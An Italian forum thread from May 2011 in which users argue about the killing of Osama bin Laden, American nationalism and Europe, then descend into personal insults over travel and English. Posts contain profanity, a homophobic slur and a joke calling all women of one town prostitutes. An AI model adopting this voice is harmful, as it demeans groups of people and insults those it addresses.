per avergli seccato il capo e il responsabile "morale" (noooo non era luiiii complooottoooo era un'altro ecc ecc). Il fatto che non abbiano nuclearizzato TUTTI i terroristi non implica che non sia possibile festeggiare la sconfitta di quello che era uno dei capoccia. Quando nuclearizzeranno anche gli altri, si festeggerà anche allora.
possiamo star qua a discutere sul buon gusto di festeggiare la morte di un uomo (facile fa i finocchi col culo degli altri, noi abbiamo festeggiato eccome a suo tempo), ma dire che pensano di aver risolto il problema è una cagata, basta leggere non dico gli articoli, ma anche solo i titoli dei giornali.
???? Ah perchè l'Europa non ha avuto attacchi terroristici :nod: :nod: :nod:
hai presente le torri gemelle alka? quei grattacieli grooooossi grooooosi dove ci sono entrati 2 aeroplani seccando più di 3000 persone?
Ipnotik
3rd May 2011, 21:03
ma vogliamo parlare delle tshirt ufficiali sulla morte di osama?
http://www.repubblica.it/esteri/2011/05/03/foto/t-shirt_bin_laden_boom_di_acquisti_sul_web-15720087/1/
abbastanza di cattivo gusto, però mi hai ricordato il giorno dopo l'attentato alle torri, verso mezzogiorno credo, si stava osservando qualche minuto di silenzio, e 4 pakistani fuori dal bar sono passati sghignazzando con la maglietta proud to be pakistan...
Alkabar
3rd May 2011, 22:10
hai presente le torri gemelle alka? quei grattacieli grooooossi grooooosi dove ci sono entrati 2 aeroplani seccando più di 3000 persone?
Noi abbiamo avuto solo culo eh, perchè in Spagna hanno bombardato i treni e in UK la tube, i bus e i treni, potenzialmente potevano fare gli stessi danni. Non diciamo follie per favore, gli USA sono come un bulletto di quartiere che siccome è piu' grosso bulla tutto il pianeta, si incazza se il pianeta si rivolta contro e gode quando riesce a vendicarsi.
Poi sei tu che dici "fai il finocchio col culo degli altri", ma in UK ci sono stati due attentati, falliti miseramente, mentre vivevo la... Il tizio dello Yemen beccato poco prima che mettesse in atto e l'altro idiota che è stato corcato di botte Glasgow dopo essere uscito dal gippone a modi rambo.
tutto vero, ma le reazioni di pancia le hai quando incassi i danni, qua siamo stati a rischio ma nessuno in realtà ha mai sentito la minaccia. Se ci avessero tirato giù il colosseo stai certo che ora ci sarebbe gente a festeggiare anche a roma.
discorso magliette, mo escono le magliette -> tutti americani sono invasati
qua a milano la gente girava con le megliette COCAINA -> tutti gli italiani sono dei drogati teste di cazzo.
Alkabar
3rd May 2011, 22:48
tutto vero, ma le reazioni di pancia le hai quando incassi i danni, qua siamo stati a rischio ma nessuno in realtà ha mai sentito la minaccia. Se ci avessero tirato giù il colosseo stai certo che ora ci sarebbe gente a festeggiare anche a roma.
discorso magliette, mo escono le magliette -> tutti americani sono invasati
qua a milano la gente girava con le megliette COCAINA -> tutti gli italiani sono dei drogati teste di cazzo.
:O .... ci sei stato almeno UNA volta in america ??? E' un grande paese, ma il 70% è talmente a destra che la nostra gente di destra per loro è comunista.
Glasny
3rd May 2011, 23:14
Tango is down tango is down!
http://www.youtube.com/watch?v=_fm43Gfq0mE
A me è subito venuto in mente questa scena. Mi sa tanto che Obama si farà tutti e 3 (o era 4 il limite?) i mandati.
:O .... ci sei stato almeno UNA volta in america ??? E' un grande paese, ma il 70% è talmente a destra che la nostra gente di destra per loro è comunista.si, e non capisco che minchia centri con sto discorso. Poi usando come paragone italia e svizzera farei cambio istant per avere la politica americana.
NelloDominat
4th May 2011, 03:38
:O .... ci sei stato almeno UNA volta in america ??? E' un grande paese, ma il 70% è talmente a destra che la nostra gente di destra per loro è comunista.
HAHAHAHAHAHAHA E tu ci sei stato porco ido? Questa quasi la metto in firma. Confondi il patriottismo per la destra. Quando anche il comunista puo' essere patriottista vedi Stalinismo. Putroppo non vivendo in nord america non vedi tutti i riferimenti alla bandiera, alla patria, all'unità nazionale. Questo amore incondizionale per la propria bandiera nasce dal semplice fatto che spesso hanno (abbiamo) tante cose in comune tra di loro (noi) e sono (siamo) fieri del proprio (nostro) paese. Cosa che ovviamente non capisci ancora visto che hai in testa l'immagine del disprezzo e dell'imbarazzo generale degli Italiani per l'italia...
:O .... ci sei stato almeno UNA volta in america ??? E' un grande paese, ma la loro destra pensa che la nostra gente di destra per 70% è talmente corrotta.
Fixed.
Alkabar
4th May 2011, 09:28
HAHAHAHAHAHAHA E tu ci sei stato porco ido?
Si. Ho viaggiato piu' di te, molto, molto piu' di te, tanto che non metterti a discutere perchè già è ridicolo che vieni a farmi il nazionalista spocchioso americano quando sei Canadese. Ho amici americani, di cui uno è tra i migliori amici di mia moglie. Non so tu che ti bevi Nello, ma con sto atteggiamento di essere l'unico che sia MAI stato da quelle parti hai rotto le palle.
Al punto dei fatti, conosco molta piu' gente di te che viene da tutti gli ambiti, in tutto il mondo. E per di piu' tu stai in Canada, quindi non mi scassare la minchia.
Questa quasi la metto in firma. Confondi il patriottismo per la destra. Quando anche il comunista puo' essere patriottista vedi Stalinismo. Putroppo non vivendo in nord america non vedi tutti i riferimenti alla bandiera, alla patria, all'unità nazionale. Questo amore incondizionale per la propria bandiera nasce dal semplice fatto che spesso hanno (abbiamo) tante cose in comune tra di loro (noi) e sono (siamo) fieri del proprio (nostro) paese. Cosa che ovviamente non capisci ancora visto che hai in testa l'immagine del disprezzo e dell'imbarazzo generale degli Italiani per l'italia...
Ecco il solito caprone che carica dritto:
Il nazionalismo bigotto americano, DA CUI IL PARALLELISMO CON LA DESTRA dato che il nazionalismo è molto piu' tipico di un ambiente conservatore di destra, di cui il canada è come al solito la brutta copia, come lo è il dollaro canadese del dollaro, ha già fatto piu' danni della grandine e continua a farne sulla base del fatto che l'america è la nazione con l'esercito piu' grosso in assoluto. E' piu' forte: non è migliore, piu' intelligente, superiore culturalmente. E' solo piu' forte.
La loro nazione non rappresenta l'umanità, non è un modello per nessuno e nessuno gli ha mai dato questo diritto, se lo sono presi in base alle armi che hanno. Uguale Bush, uguale Obama, uguale qualunque presidente mai venga.
E tra parentesi, io posso anche disprezzare gli Italiani degli ultimi 60 anni, ma c'è molto di piu' ad essere orgogliosi dell'Italia e dell'Europa, nella sua storia, che dell'america e dell'atteggiamento di merda imperialista americano.
Fixed.
Fixed.
Alkabar
4th May 2011, 09:36
si, e non capisco che minchia centri con sto discorso.
Ah beh, allora inutile andare avanti.
Poi usando come paragone italia e svizzera farei cambio istant per avere la politica americana.
Edit. Non mi ci perdo nemmeno in sto discorso.
ok alka, disprezziamo l'europa degli ultimi 60 anni, invece prima era molto meglio! Oh wait.
http://www.terninrete.it/headlines_articoli/HL_PRD_93180/immagini/hitler-mussolini.jpg
Alkabar
4th May 2011, 10:31
ok alka, disprezziamo l'europa degli ultimi 60 anni, invece prima era molto meglio! Oh wait.
http://www.terninrete.it/headlines_articoli/HL_PRD_93180/immagini/hitler-mussolini.jpg
E perchè ho detto 60 anni secondo te? Tu per me tiri su l'acqua sporca del WC. Rigliatiiiiii !!!!
holysmoke
4th May 2011, 10:39
Rigliatiiiiii !!!!
aO pagami i diritti :nod:
60 anni fa era 1950 :sneer:
dai alka su essere anti americano è fuori moda da un pezzo. Noi non facciamo peggio solo perchè non abbiamo i mezzi materiali per farlo :sneer:
Alkabar
4th May 2011, 11:28
60 anni fa era 1950 :sneer:
dai alka su essere anti americano è fuori moda da un pezzo. Noi non facciamo peggio solo perchè non abbiamo i mezzi materiali per farlo :sneer:
Guarda che l'Europa c'ha la Germania, la Francia e l'Inghilterra dentro... sono tutti nel G8...
Ok, non mi piace come vanno le politiche interne Europee in questo momento, ma non ti scordare che
a) Crisi economica del 2008 è stata causata dalle banche americane
b) Dall'eccessiva spesa nell'esercito
c) Da politiche indiscriminate di bonus consentite proprio da quella merdosa politica americana
Se siamo in questa situazione è proprio a causa della politica americana. 700 miliardi di dollari ha fatto Bush di buco con le sue politiche repubblicane di sto paio di palle.
Non c'è proprio niente da ammirare.
L'Europa non è merda solo perchè ci vivi dentro, le idee su cui stiamo cercando di poggiare il concetto di Europa sono molto piu' di alto livello e ambiziose di qualunque altro stato, nazione o continente al mondo. Che poi non funzioni una sega lo si constata di già, ma perchè vogliono fare qualcosa di difficile, se era facile lo facevano tutti e faceva cagare a prescindere.
forse non hai capito che la crisi è nata dall'america perchè dipendiamo completamente dall'america. Crisi e boom economico tutto dipende sempre da loro, dato che noi in confronto non contiamo un cazzo. Anche irlanda, portogallo e grecia hanno avuto crisi ma non ce ne è fregato relativamente un cazzo dato che non contano niente. Cioè non puoi prendertela per quel che va male e basta, se non fossimo fanalini di cosa la crisi non ci avrebbe aperto il culo così tanto, dato che lo siamo, puppiamo duro.
Non ci si può "dimenticare" a comando che gran parte del progresso scientifico, tecnologico, industriale ecc viene da li e prendersela solo con le banche della crisi, fa ridere.
piuttosto di lamentarsi della spesa americana che saran anche cazzi degli americani io mi lamenterei della nostra spesa militare, o dei nostri amici francesi, non mi pare proprio che si possa dire di essere in una situazione di illuminata europa e retrograda america, anzi, a me pare che l'europa stia peggiorando sempre di più, prendendo il peggio dalla sua storia, da quella americana e mettendoci anche del nuovo (negativo).
Necker
4th May 2011, 12:41
cmque hador non capisco cosa c'entri il parallelismo con noi e mussolini e piazzale loreto. Eravamo in guerra quello era un dittatore che in Italia ha imperversato combinandone di ogni, spiegami che c'entra con un terrorista fantasma vissuto 60 anni dopo e che in america non c'ha mai messo piede.
Si son beccati il più spaventoso attacco terroristico, ok, di pancia, come detto, può essere plausibile mostrare un certo sollievo... ma resta il fatto che festeggiare per sta cagata è un gesto quantomeno risibile. Tutto qui.
Se poi gli americani fossero un pelo più informati, scommetto che invece che scendere in piazza a fare macello, sarebbero andati dritti dritti a Washington a pisciare sul giardino della casa bianca..
informati come voi che leggete l'interweb!
per il resto, facendo una citazione:
5. In guerra nessuno è intelligente. Non devi credere alla verità di nessuno. Le lunghe disquisizioni sull’insensatezza della guerra del professore di una volta, in un batter d’occhio si trasformano in un selvaggio grido di guerra, appena egli viene a conoscenza del fatto che il suo bambino gli è morto per la strada.
Alkabar
4th May 2011, 14:07
forse non hai capito che la crisi è nata dall'america perchè dipendiamo completamente dall'america. Crisi e boom economico tutto dipende sempre da loro, dato che noi in confronto non contiamo un cazzo. Anche irlanda, portogallo e grecia hanno avuto crisi ma non ce ne è fregato relativamente un cazzo dato che non contano niente. Cioè non puoi prendertela per quel che va male e basta, se non fossimo fanalini di cosa la crisi non ci avrebbe aperto il culo così tanto, dato che lo siamo, puppiamo duro.
Non ci si può "dimenticare" a comando che gran parte del progresso scientifico, tecnologico, industriale ecc viene da li e prendersela solo con le banche della crisi, fa ridere.
piuttosto di lamentarsi della spesa americana che saran anche cazzi degli americani io mi lamenterei della nostra spesa militare, o dei nostri amici francesi, non mi pare proprio che si possa dire di essere in una situazione di illuminata europa e retrograda america, anzi, a me pare che l'europa stia peggiorando sempre di più, prendendo il peggio dalla sua storia, da quella americana e mettendoci anche del nuovo (negativo).
Ma si puo' sapere che c'entra questo, perchè secondo te gli scienziati americani pensano dell'america tanto differentemente da quello che dico io? Toh, ho lavorato con un postdoc americano per 2 anni che diceva chiaramente che l'america è fascista e maggior parte delle persone terribilmente razziste. Oltre tutto gli scienziati americani sono tra i meno nazionalisti della popolazione, sono i primi a dire che sta storia del nazionalismo, riproposta poi con forza da Nello, è una becera cagata per mantenere controllo sulla popolazione e una idea di competitività col resto del mondo.
Poi... come se non bastasse, anche gran parte delle scoperte scientifiche attuali viene dall'Europa e non dagli US solamente.... Tantissime da UK, tantissime da Francia e Germania, un po' meno dall'Italia.
Non venirmi a parlare della loro superiorità in ricerca, grazie, non sono superiori, hanno dei soldi da spendere in piu', ma in Europa abbiamo tantissime università di rilievo mondiale, tra cui tre o quattro nelle prime dieci nell'indice per la produzione di ricerca (Oxford, Cambridge, Imperial College.... ma poi c'è Edinburg, c'è EPFL, c'è ETH, c'è l'università di Parigi, di Berlino e via dicendo) piano con sto atteggiamento dismissivo con l'Europa, che non abbiamo un cazzo da invidiare a nessuno.
Alkabar
4th May 2011, 14:10
Ah adesso l'operato di Obama va GENERALMENTE bene:
http://www.nytimes.com/2011/05/05/us/politics/05poll.html
:rotfl: :rotfl:
quando faceva cose importanti come politica energetica e healthcare, tutti a criticarlo. Ora fa fuori un coglione infoiato e tutte le critiche sono state dimenticate. :nod: :nod:
In America l'average è Homer Simpson, DEVE esserlo.
Ma si puo' sapere che c'entra questo, perchè secondo te gli scienziati americani pensano dell'america tanto differentemente da quello che dico io? Toh, ho lavorato con un postdoc americano per 2 anni che diceva chiaramente che l'america è fascista e maggior parte delle persone terribilmente razziste. Oltre tutto gli scienziati americani sono tra i meno nazionalisti della popolazione, sono i primi a dire che sta storia del nazionalismo, riproposta poi con forza da Nello, è una becera cagata per mantenere controllo sulla popolazione e una idea di competitività col resto del mondo.
Poi... come se non bastasse, anche gran parte delle scoperte scientifiche attuali viene dall'Europa e non dagli US solamente.... Tantissime da UK, tantissime da Francia e Germania, un po' meno dall'Italia.
Non venirmi a parlare della loro superiorità in ricerca, grazie, non sono superiori, hanno dei soldi da spendere in piu', ma in Europa abbiamo tantissime università di rilievo mondiale, tra cui tre o quattro nelle prime dieci nell'indice per la produzione di ricerca (Oxford, Cambridge, Imperial College.... ma poi c'è Edinburg, c'è EPFL, c'è ETH, c'è l'università di Parigi, di Berlino e via dicendo) piano con sto atteggiamento dismissivo con l'Europa, che non abbiamo un cazzo da invidiare a nessuno.io penso che la devi piantare con le generalizzazioni dato che lo fai spesso. Conosco un post doc -> gli scienziati americani. Foto di americani che festeggiano -> gli usa devono morire. E via dicendo, perchè non lo fai mai al contrario sto ragionamento? Anche l'italia è fascista e la maggior parte delle persone terribilmente razziste, ed è così in mezza europa, benvenuto nel 2011 alka buongiorno. Ma questo non capisco cosa centri con la filippica contro gli USA.
continuo inoltre a non capire cosa centri il nazionalismo con il festeggiare l'aver seccato uno che ti ha tirato giu due grattacieli, è un po' come dire "dato che in italia ai mondiali abbiamo festeggiato tutti, l'italia è un paese di nazionalisti".
come tutti i paesi gli usa hanno tratti culturali positivi e negativi, poniamo il nazionalismo tra i negativi, al netto stanno comunque messi molto meglio di noi.
Hardcore
4th May 2011, 14:48
Ma il video??
Alkabar
4th May 2011, 14:49
io penso che la devi piantare con le generalizzazioni dato che lo fai spesso. Conosco un post doc -> gli scienziati americani. Foto di americani che festeggiano -> gli usa devono morire. E via dicendo, perchè non lo fai mai al contrario sto ragionamento? Anche l'italia è fascista e la maggior parte delle persone terribilmente razziste, ed è così in mezza europa, benvenuto nel 2011 alka buongiorno.
O Mattia te lo devo proprio dire: sei stato col culo fermo in Italia per tutta la tua vita e ne esci fuori giusto adesso per la prima volta. Ho un collega americano conosciuto direttamente + tutti quelli che ho incontrato alle conferenze in cui sono stato, piu' tutti gli altri con cui ho lavorato che stanno l'imperial college. E si parla anche di politica tra un caffe e un altro in queste conferenze/meeting di lavoro. Non sono affatto contenti di sto nazionalismo dilagante e della politica del terrore perpetrata da Bush. E che pare non sia proprio finita con Obama, come si sperava.
Ma questo non capisco cosa centri con la filippica contro gli USA.
continuo inoltre a non capire cosa centri il nazionalismo con il festeggiare l'aver seccato uno che ti ha tirato giu due grattacieli, è un po' come dire "dato che in italia ai mondiali abbiamo festeggiato tutti, l'italia è un paese di nazionalisti".
come tutti i paesi gli usa hanno tratti culturali positivi e negativi, poniamo il nazionalismo tra i negativi, al netto stanno comunque messi molto meglio di noi.
Perchè ce l'hanno messo loro Osama bin Laden. E' un mostro creato dagli USA, e con il nazionalismo bigotto di quale sono pregni, non se ne rendono nemmeno conto. Ma vuoi un disegno o che?
che minchia ne sai di chi conosco e soprattutto di dove sono stato scusa? CAFOLO VAI ALLE CONFERENZE! SEI L'UNICO CHE CONOSCE DEGLI AMERICANIH! alka eddai però.
E' perchè non ho facebook e quindi secondo te non mi sposto/non conosco nessuno fuori dalla lombardia? :nod:
e soprattutto, il fatto che sia "creato dagli usa" non capisco come possa impedire di festeggiare. Ripensando poi alla nostra esperienza in merito (mussolini non era creato dagli italiani? E bum tutti antifascisti poi!) poi fa ancora più ridere sto discorso.
tu assumi che festeggiare la morte di bin laden implichi credere ciecamente nella politica militare alla bush, vatti a rileggere il tuo cite sul discorso assunzioni :nod:
Alkabar
4th May 2011, 15:10
che minchia ne sai di chi conosco e soprattutto di dove sono stato scusa? CAFOLO VAI ALLE CONFERENZE! SEI L'UNICO CHE CONOSCE DEGLI AMERICANIH! alka eddai però.
E' perchè non ho facebook e quindi secondo te non mi sposto/non conosco nessuno fuori dalla lombardia? :nod:
e soprattutto, il fatto che sia "creato dagli usa" non capisco come possa impedire di festeggiare. Ripensando poi alla nostra esperienza in merito (mussolini non era creato dagli italiani? E bum tutti antifascisti poi!) poi fa ancora più ridere sto discorso.
tu assumi che festeggiare la morte di bin laden implichi credere ciecamente nella politica militare alla bush, vatti a rileggere il tuo cite sul discorso assunzioni :nod:
Va beh, lascio perdere, sono troppo stanco di sti tempi per continuare a discuterne. Vedrai per conto tuo.
Warbarbie
4th May 2011, 15:11
Cristo :rotfl: :rotfl:
McLove.
4th May 2011, 15:18
http://www.youtube.com/watch?v=eysJA13_RB8
NelloDominat
4th May 2011, 15:19
Si. Ho viaggiato piu' di te, molto, molto piu' di te, tanto che non metterti a discutere .
Che cazzo ne sai quanto e dove ho viaggiato. Ti lascio solo un hint per chiudere un’altra delle tue frasi inutili. Quando ero un bambino voglio solo farti presente che mio padre era atleta a livello internazionale (con relative olimpiadi/World Cup allegate), Mia madre interprete della FISI oltre che per lavoro dove ha (abbiamo) girato mezza Europa e non solo (senza considerare il fatto che I miei amavano viaggiare), Famiglia sparsa nel mondo, Canada, USA, Australia, Germania, Zimbabwe e I nuovi innesti da Portogallo e UK (ora). Da quando sono qui: tra lavoro e piacere sono andato da Cuba alla Malesia facendo stop in mezza US Quindi la tua frase e’ un fail ancora prima di iniziare. Almeno stessi zitto invece di sparare cazzate a persone che manco conosci.
perchè già è ridicolo che vieni a farmi il nazionalista spocchioso americano quando sei Canadese. Ho amici americani, di cui uno è tra i migliori amici di mia moglie. Non so tu che ti bevi Nello, ma con sto atteggiamento di essere l'unico che sia MAI stato da quelle parti hai rotto le palle.
Al punto dei fatti, conosco molta piu' gente di te che viene da tutti gli ambiti, in tutto il mondo. E per di piu' tu stai in Canada, quindi non mi scassare la minchia .
Leggi quello che hai scritto e mi vieni dire a me che sono lo spocchioso? Tu sai chi conosco? Tu sai in che ambient vivo o vivevo? P.S. io SONO AMERICANO. Non sono statunitense, ma sono AMERICANO. Persino il mio imprint biologico e’ AMERICANO visto che sono stato concepito in AMERICA e i primi 6 anni di vita li ho fatti qui. “Al punto dei fatti” che pretendi di avere il pisello piu’ lungo quando cerchi di misurarlo al buio con qualcuno. Dai dello spocchioso alla gente… Ma chi e’ presuntuoso, arrogante e’ molto facile da intuire leggendo I due quote precedent.
Ecco il solito caprone che carica dritto:
Il nazionalismo bigotto americano, DA CUI IL PARALLELISMO CON LA DESTRA dato che il nazionalismo è molto piu' tipico di un ambiente conservatore di destra,
HAHAHAHAHAHAHAHAHAHAHAHAHAHAHA…. You still CHAIN FAIL ….
di cui il canada è come al solito la brutta copia, come lo è il dollaro canadese del dollaro,
E’ certo… peccato che entrambe derivino dal DOLLARO SPAGNOLO… ignorante, Almeno ti informassi un pocehttino prima di sparare l’ennesima cazzata! Prima in USA, Poi in Canada e’ stato addottato il $ poiche’ decimale. Infatti come dici tu il Canada “copia” dagli USA… SIII CERRRTO! HAHAHA peccato che qui si vada a Km/h e non a Miles, qui si va Kg e non a Lb, qui si va Cm non inches… Le unita’ decimali di fatto sono piu’ comode. Meglio delle sterline non trovi? Sempre parlando di finanza… vuoi parlare del sistema bancario USA e Canadese?
ha già fatto piu' danni della grandine e continua a farne sulla base del fatto che l'america è la nazione con l'esercito piu' grosso in assoluto. E' piu' forte: non è migliore, piu' intelligente, superiore culturalmente. E' solo piu' forte.
Cosa vuol dire piu’ grosso? Piu’ forte? Dal tuo punto vista?
La loro nazione non rappresenta l'umanità, non è un modello per nessuno e nessuno gli ha mai dato questo diritto, se lo sono presi in base alle armi che hanno. Uguale Bush, uguale Obama, uguale qualunque presidente mai venga.
E tra parentesi, io posso anche disprezzare gli Italiani degli ultimi 60 anni, ma c'è molto di piu' ad essere orgogliosi dell'Italia e dell'Europa, nella sua storia, che dell'america e dell'atteggiamento di merda imperialista americano.
Fixed.
Questo e’ il tuo modo di vedere le cose. Di tutto il tuo reply solo questa parte ha un senso nella tua prolissa ammasso di cazzate. Non e’ assolutamente il mio pensiero, sia ben chiaro. Ma almeno questa parte puo’ offrire uno spunto di discussione.
Warbarbie
4th May 2011, 15:24
Io sono stato 1 mese in america a 17 anni, posso postare?:(
NelloDominat
4th May 2011, 15:41
Io sono stato 1 mese in america a 17 anni, posso postare?:(
No tu stai zitto che sei inutile... Poi alla luce delle ultime tue foto... beh... non vado oltre :sneer:
Nello = Redneck
GNEGNEGNE!!!
P.S.
Le pannocchie si mangiano non ci si fanno i giochini pannocchiosi!
Nazgul Tirith
4th May 2011, 15:46
Figa nello che entrata a gamba tesa :rotfl:
http://9a.img.v4.skyrock.net/9ae/soso69-972/pics/1526731160.jpg
Alkabar
4th May 2011, 15:50
Nello, prima di andare al lavoro:
http://www.shockya.com/news/wp-content/uploads/captain_america_movie.jpg
Che cazzo ne sai quanto e dove ho viaggiato. Ti lascio solo un hint per chiudere un’altra delle tue frasi inutili. Quando ero un bambino voglio solo farti presente che mio padre era atleta a livello internazionale (con relative olimpiadi/World Cup allegate), Mia madre interprete della FISI oltre che per lavoro dove ha (abbiamo) girato mezza Europa e non solo (senza considerare il fatto che I miei amavano viaggiare), Famiglia sparsa nel mondo, Canada, USA, Australia, Germania, Zimbabwe e I nuovi innesti da Portogallo e UK (ora). Da quando sono qui: tra lavoro e piacere sono andato da Cuba alla Malesia facendo stop in mezza US Quindi la tua frase e’ un fail ancora prima di iniziare. Almeno stessi zitto invece di sparare cazzate a persone che manco conosci.
Leggi quello che hai scritto e mi vieni dire a me che sono lo spocchioso? Tu sai chi conosco? Tu sai in che ambient vivo o vivevo? P.S. io SONO AMERICANO. Non sono statunitense, ma sono AMERICANO. Persino il mio imprint biologico e’ AMERICANO visto che sono stato concepito in AMERICA e i primi 6 anni di vita li ho fatti qui. “Al punto dei fatti” che pretendi di avere il pisello piu’ lungo quando cerchi di misurarlo al buio con qualcuno. Dai dello spocchioso alla gente… Ma chi e’ presuntuoso, arrogante e’ molto facile da intuire leggendo I due quote precedent.
HAHAHAHAHAHAHAHAHAHAHAHAHAHAHA…. You still FAIL CHAIN ….
E’ certo… peccato che entrambe derivino dal DOLLARO SPAGNOLO… ignorante, Almeno ti informassi un pocehttino prima di sparare l’ennesima cazzata! Prima in USA, Poi in Canada e’ stato addottato il $ poiche’ decimale. Infatti come dici tu il Canada “copia” dagli USA… SIII CERRRTO! HAHAHA peccato che qui si vada a Km/h e non a Miles, qui si va Kg e non a Lb, qui si va Cm non inches… Le unita’ decimali di fatto sono piu’ comode. Meglio delle sterline non trovi? Sempre parlando di finanza… vuoi parlare del sistema bancario USA e Canadese?
Cosa vuol dire piu’ grosso? Piu’ forte? Dal tuo punto vista?
Questo e’ il tuo modo di vedere le cose. Di tutto il tuo reply solo questa parte ha un senso nella tua prolissa ammasso di cazzate. Non e’ assolutamente il mio pensiero, sia ben chiaro. Ma almeno questa parte puo’ offrire uno spunto di discussione.
Giusto una cosa, Captain America, si scrive "you still chain fail". Io non fallisco catene. Eventualmente fallisco a catena.
Per essere americano il tuo inglese fa davvero, davvero cagare. :rotfl: :rotfl:
Ciao eh.
Aspetta che questa la metto in firma va...
NelloDominat
4th May 2011, 15:52
Giusto una cosa, Mr American, si scrive "you still chain fail". Io non fallisco catene. Eventualmente fallisco a catena.
Per essere americano il tuo inglese fa davvero, davvero cagare. :rotfl: :rotfl:
Ciao eh.
Aspetta che questa la metto in firma va...
:look::look:
:rotfl::rotfl::rotfl:
Metti in firma... il fatto che non sai leggere o il fatto che riprendi qualcuno failando ancora?
Nazgul Tirith
4th May 2011, 15:54
@Alka
La frase:
Si. Ho viaggiato piu' di te, molto, molto piu' di te, tanto che non metterti a discutere .
E' di una supponenza Epic in quanto riferla a qualcuno di cui non sai un cazzo e' molto :rotfl:
holysmoke
4th May 2011, 15:56
alka ripigliati hai failato peso :rotfl:
NelloDominat
4th May 2011, 15:56
HAHAHAHAHAHAHAH
ALKA CHE EDITA IL SUO POST! E CAMBIA IL MIO QUOTE
perche' avevo visto l'errore e editato ben prima che arrivasse lui smerigliare la cappella con il reply inutile....
Double FAIL.
Alkabar
4th May 2011, 15:57
@Alka
La frase:
E' di una supponenza Epic in quanto riferla a qualcuno di cui non sai un cazzo e' molto :rotfl:
Perchè Naz, con buona pazienza, uno si rompe anche i coglioni delle entrate a gamba tesa. Lo so che è brutta da dire, ed è ovvio che è messa li per trollare, ma uno si spacca le balle eh.
Ma poi, Nello nemmeno parla un inglese comprensibile, quindi, a posteriori anche se messa li per trollare, non era poi sbagliata come frase.
ilsagola
4th May 2011, 15:58
Guerra fra new papà, guardali che acidità intrinseca che si portano dietro.. :sneer:
Dan Palmer
4th May 2011, 15:59
Ma Alkbar e Necker stanno facendo a gara a chi scrive le puttanate più grosse?
Gara bella e tirata tra l'altro, anche se Necker si è un po' spento nelle ultime pagine.
Milker
4th May 2011, 15:59
quindi chi è il vincitore che posso sfidare vincendo a mani basse? :sneer:
Nazgul Tirith
4th May 2011, 16:00
Perchè Naz, con buona pazienza, uno si rompe anche i coglioni delle entrate a gamba tesa. Lo so che è brutta da dire, ed è ovvio che è messa li per trollare, ma uno si spacca le balle eh.
Ma poi, Nello nemmeno parla un inglese comprensibile, quindi, a posteriori anche se messa li per trollare, non era poi sbagliata come frase.
Alka senza offesa io con nello ci ho parlato piu e piu volte e sa un inglese pressoche' ottimo, prima di giudicare qualcuno lo dovresti conoscere, un po come la storia del "EHHH IO VAGGIOO" ma c'e sempre chi viaggia il triplo di te, questa board compresa :sneer:
Un errore capita in italiano figurati in inglese :sneer:
Alkabar
4th May 2011, 16:00
HAHAHAHAHAHAHAH
ALKA CHE EDITA IL SUO POST! E CAMBIA IL MIO QUOTE
perche' avevo visto l'errore e editato ben prima che arrivasse lui smerigliare la cappella con il reply inutile....
Double FAIL.
Ci fosse solo una volta che scrivi bene in inglese.... :nod:
Alkabar
4th May 2011, 16:04
Fa specie che viene a fare l'americano e sbaglia a scrivere in inglese, tutto qua. A Dopo.
Randolk
4th May 2011, 16:07
ma perchè questo clima teso?
il male è sconfitto, la principessa e il principe sono convolati a giuste nozze, perchè non siete tutti felici e contenti brutti figli di puttana?
ilsagola
4th May 2011, 16:08
Ma infatti il 3d è Osama è morto, dovremmo solo fare festa :confused:
Randolk
4th May 2011, 16:09
p.s. per nello: motherfuckin' bitches of a son
jamino
4th May 2011, 16:12
ma perchè questo clima teso?
il male è sconfitto, la principessa e il principe sono convolati a giuste nozze, perchè non siete tutti felici e contenti brutti figli di puttana?
TI sei dimenticato che il cattivo visir è stato eliminato dalla champions... altro elemento indispensabile per comporre questo quadretto idilliaco.
Necker
4th May 2011, 16:26
Gara bella e tirata tra l'altro, anche se Necker si è un po' spento nelle ultime pagine.
e questo da dove esce? Da me che diamine vuoi di preciso? il mio pensiero l'ho detto e ripetuto, alka poi ha preso a discutere su altri argomenti dei quali non sto a invischiarmi... se hai qualcosa da dire che sia inerente, dillo invece che provocare a vanvera.
Sembri la copia malriuscita di quell'altro stordito nickcoso.. :sneer:
Alkabar
4th May 2011, 16:27
Fammi indovinare: anche tu americano :point: .
edit: ma solo di imprinting biologico, o parli pure bene in inglese?
qualcuno apra un thread sugli israeliani imo :nod:
Ipnotik
4th May 2011, 16:32
io raga ieri sono stato a Empoli e, fidatevi di chi le conosce, le empolesi sono tutte troie. Mi dispiace se uno dei voi ha la mamma o la sorella di Empoli, pero' ho l'esperienza per dirlo avendo viaggiato molto nel centro di Empoli ieri.
Detto questo, /thread
mondo secondo alka:
http://www.lowbird.com/data/images/2010/11/apcdn-36112.png
Bortas
4th May 2011, 16:36
io raga ieri sono stato a Empoli e, fidatevi di chi le conosce, le empolesi sono tutte troie. Mi dispiace se uno dei voi ha la mamma o la sorella di Empoli, pero' ho l'esperienza per dirlo avendo viaggiato molto nel centro di Empoli ieri.
Detto questo, /thread
Come cazzo ti permetti! Noi Empolesi siamo gente seria e chiediamo il 20% alle nostre donne! Quindi piano a scambiare il termine "troie" con "fine impreditorialità".
Alkabar
4th May 2011, 16:37
Detto questo, /thread
Il discorso era piu' che agli americani il nazionalismo cosi' pressante non piace, come non gli è piaciuta la politica di Bush. E poi anche che ci stanno una marea di americani bigotti e guerrafondai, che non è proprio falso, visto che gli americani stessi lo ammettono.
Invece che parlare di quanto siano degli eroi una popolazione che mette 400 miliardi di euro nell'esercito e di quanto siano orgogliosi di essere americani e quindi i piu' grossi del mondo, magari sentite che dice un americano di quelli che è venuto via da la per vivere in Europa.
O anche solo andare la e vedere come vive una persona normale e scoprire che fare l'operaio in Italia è molto meglio che farlo negli USA.
Alkabar
4th May 2011, 16:44
mondo secondo alka:
http://www.lowbird.com/data/images/2010/11/apcdn-36112.png
Molto meno volgare:
http://www.msxnet.org/humour/world-according-to-america.png
Un buon imprintig biologico americano a tutti.
shahaha
tornando una minima seri, vogliamo contare gli europei che vanno in america e gli americani che vengono in europa? :D Poi, europa, europa mica è una nazione venire in europa non vuol dire un cazzo :nod:
Hardcore
4th May 2011, 17:23
Non so se avete visto il link che gira su Facebook, con link esterno a un sito...
Ma come cazzo si fa a cliccare su un link in cui c'è scritto blablabla/strumer.php?<script> ecc Ma dai cazzo -.-
Nazgul Tirith
4th May 2011, 17:29
Non so se avete visto il link che gira su Facebook, con link esterno a un sito...
Ma come cazzo si fa a cliccare su un link in cui c'è scritto blablabla/strumer.php?<script> ecc Ma dai cazzo -.-
No per fortuna non lo guardo facebook.
Dettagli sul sito ? :rotfl:
